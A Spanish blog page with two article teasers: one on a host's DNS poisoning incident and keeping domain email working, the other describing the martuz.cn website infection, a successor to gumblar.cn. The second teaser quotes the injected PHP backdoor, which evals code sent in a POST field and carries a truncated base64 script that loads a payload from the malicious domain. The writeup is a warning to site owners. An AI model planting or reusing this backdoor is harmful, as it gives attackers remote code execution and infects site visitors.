Hace algunas semanas el servicio donde tengo hospedado uno de mis sitios, tuvo un problema con uno de sus servidores DNS, sufrieron una contaminación (DNS poisoning) en los registros de algunos dominios; lo que provoco que estos redirigieran hacia otra IP fuera del proveedor. Por suerte el problema fue corregido al aplicar una actualización pendiente de seguridad en BIND (el nameserver de facto en *nix).
Me recuerda que ni hay proveedor infalible, y eventualmente todos tendrán que fallar, según la Ley de Murphy, así es como funcionan las maquinas, no son perfectas. Por experiencia propia con los proveedores de hosting, se que los dominios pueden dejar de resolver correctamente
Algunas personas por razones de marca (branding) usan su nombre de dominio para sus direcciones de correo electrónico; ya sea que usen el servidor de correo incluido en el servicio, o uno externo como el de Google Apps. Dependiendo del negocio entorno al nombre dominio, tal vez no sea tan critico que el sitio.....
Leer el arículo completo
Recientemente muchos sitios web han sido infectados con un código malicioso alojado en el dominio martuz.cn (95 .129 .145 .58). Este script no es mas que la evolución del script conocido como gumblar.cn que ya no esta activo.
El script inyecta un código malicioso codificado en los archivos .php y .html de los sitios web infectados, sin embargo no altera el contenido del sitio web, ya que de lo que se trata es de llamar al verdadero archivo ejecutable que se encuentra alojado en el dominio martuz.cn de esta manera cuando el visitante desprevenido visita un sitio web infectado, ejecuta sin darse cuenta un script malicioso alojado en otro servidor. Debido a este comportamiento, los usuarios de firefox con NoScript son inmunes.
El código insertado es similar al siguiente:
if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW.....
Leer el arículo completo